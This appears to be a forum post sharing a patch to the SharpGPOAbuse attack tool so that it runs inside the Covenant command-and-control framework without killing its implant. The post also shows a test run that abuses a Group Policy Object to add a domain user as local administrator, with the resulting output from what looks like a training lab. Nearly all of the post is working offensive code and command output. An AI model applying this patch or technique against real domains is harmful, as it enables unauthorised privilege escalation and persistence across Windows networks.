For those who come across the topic and want to use Covenant and SharpGPO together; youll want to try the patch below:
diff --git a/SharpGPOAbuse/Program.cs b/SharpGPOAbuse/Program.cs
index e39762c..2d69b96 100644
--- a/SharpGPOAbuse/Program.cs
+++ b/SharpGPOAbuse/Program.cs
@@ -228,7 +228,8 @@ namespace SharpGPOAbuse
catch (System.Exception ex)
{
Console.WriteLine(ex.Message + "[!] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
int new_ver = 0;
@@ -499,13 +500,15 @@ namespace SharpGPOAbuse
{
Console.WriteLine(ex.Message);
Console.WriteLine("[!] Could not update versionNumber attribute!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
}
else
{
Console.WriteLine("[!] GPO not found!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
using (System.IO.StreamReader file = new System.IO.StreamReader(path))
@@ -575,13 +578,15 @@ namespace SharpGPOAbuse
catch
{
Console.WriteLine("[!] Could not retrieve the GPO GUID. The GPO Name was invalid. \n[-] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return null;
}
}
if (String.IsNullOrEmpty(GPOGuid))
{
Console.WriteLine("[!] Could not retrieve the GPO GUID. The GPO Name was invalid. \n[-] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return null;
}
Console.WriteLine("[+] GUID of \"" + GPOName + "\" is: " + GPOGuid);
return GPOGuid;
@@ -600,10 +605,14 @@ namespace SharpGPOAbuse
catch
{
Console.WriteLine("[-] Could not find user \"" + UserAccount + "\" in the " + Domain + " domain.\n[-] Exiting...\n");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
String GPOGuid = GetGPOGUID(DomainController, GPOName, distinguished_name);
+ if (String.IsNullOrEmpty(GPOGuid)) {
+ return;
+ }
string start = @"[Unicode]
Unicode=yes
@@ -624,7 +633,8 @@ Revision=1";
else
{
Console.WriteLine("[!] Could not find the specified GPO!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// check if the folder structure for adding admin user exists in SYSVOL
@@ -652,7 +662,8 @@ Revision=1";
if (exists && !Force)
{
Console.WriteLine("[!] Group Memberships are already defined in the GPO. Use --force to make changes. This option might break the affected systems!\n[-] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// if memberships are defined and force is used
@@ -680,7 +691,8 @@ Revision=1";
}
}
UpdateVersion(Domain, distinguished_name, GPOName, GPT_path, "AddLocalAdmin", "Computer");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// if memberships are not defined
@@ -718,7 +730,10 @@ Revision=1";
{
String hidden_ini;
String GPOGuid = GetGPOGUID(DomainController, GPOName, distinguished_name);
-
+ if (String.IsNullOrEmpty(GPOGuid))
+ {
+ return;
+ }
String path = @"\\" + Domain + "\\SysVol\\" + Domain + "\\Policies\\" + GPOGuid;
String hidden_path = @"\\" + Domain + "\\SysVol\\" + Domain + "\\Policies\\" + GPOGuid;
@@ -747,7 +762,8 @@ Revision=1";
else
{
Console.WriteLine("[!] Could not find the specified GPO!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// check if the folder structure for adding admin user exists in SYSVOL
@@ -759,7 +775,8 @@ Revision=1";
if (File.Exists(path))
{
Console.WriteLine("[!] A Startup script with the same name already exists. Choose a different name.\n[-] Exiting...\n");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
if (File.Exists(hidden_path))
@@ -861,6 +878,10 @@ Revision=1";
}
String GPOGuid = GetGPOGUID(DomainController, GPOName, distinguished_name);
+ if (String.IsNullOrEmpty(GPOGuid))
+ {
+ return;
+ }
String path = @"\\" + Domain + "\\SysVol\\" + Domain + "\\Policies\\" + GPOGuid;
String GPT_path = path + "\\GPT.ini";
// Check if GPO path exists
@@ -875,7 +896,8 @@ Revision=1";
else
{
Console.WriteLine("[!] Could not find the specified GPO!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// check if the folder structure for adding scheduled tasks exists in SYSVOL
@@ -921,12 +943,14 @@ Revision=1";
{
UpdateVersion(Domain, distinguished_name, GPOName, GPT_path, "NewImmediateTask", "User");
}
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
else
{
Console.WriteLine("[!] The GPO already includes a ScheduledTasks.xml. Use --Force to append to ScheduledTasks.xml or choose another GPO.\n[-] Exiting...\n");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
}
else
@@ -958,11 +982,15 @@ Revision=1";
catch
{
Console.WriteLine("[-] Could not find user \"" + UserAccount + "\" in the " + Domain + " domain.\n[-] Exiting...\n");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
String GPOGuid = GetGPOGUID(DomainController, GPOName, distinguished_name);
-
+ if (String.IsNullOrEmpty(GPOGuid))
+ {
+ return;
+ }
string text = @"[Unicode]
Unicode=yes
[Version]
@@ -988,7 +1016,8 @@ Revision = 1
else
{
Console.WriteLine("[!] Could not find the specified GPO!\nExiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// check if the folder structure for adding admin user exists in SYSVOL
@@ -1017,7 +1046,8 @@ Revision = 1
{
// Curently there is no support for appending user rightsto exisitng ones
Console.WriteLine("[!] The GPO already specifies user rights. Select a different attack.\n[!] Exiting...");
- System.Environment.Exit(0);
+ //System.Environment.Exit(0);
+ return;
}
// if user rights are not defined
test:
Assembly /assemblyname:"SharpGPOAbuse" /parameters:"--AddLocalAdmin --UserAccount \"analyst2\" --GPOName \"test\""
[+] Domain = els-child.els.local
[+] Domain Controller = child-dc01.els-child.eLS.local
[+] Distinguished Name = CN=Policies,CN=System,DC=els-child,DC=eLS,DC=local
[+] SID Value of analyst2 = S-1-5-21-23589937-599888933-351157107-1106
[+] GUID of "test" is: {4D882DB0-0EB3-4195-9BBB-287B812DF68A}
[+] Creating file \\els-child.els.local\SysVol\els-child.els.local\Policies\{4D882DB0-0EB3-4195-9BBB-287B812DF68A}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
without the patch the Grunt just dies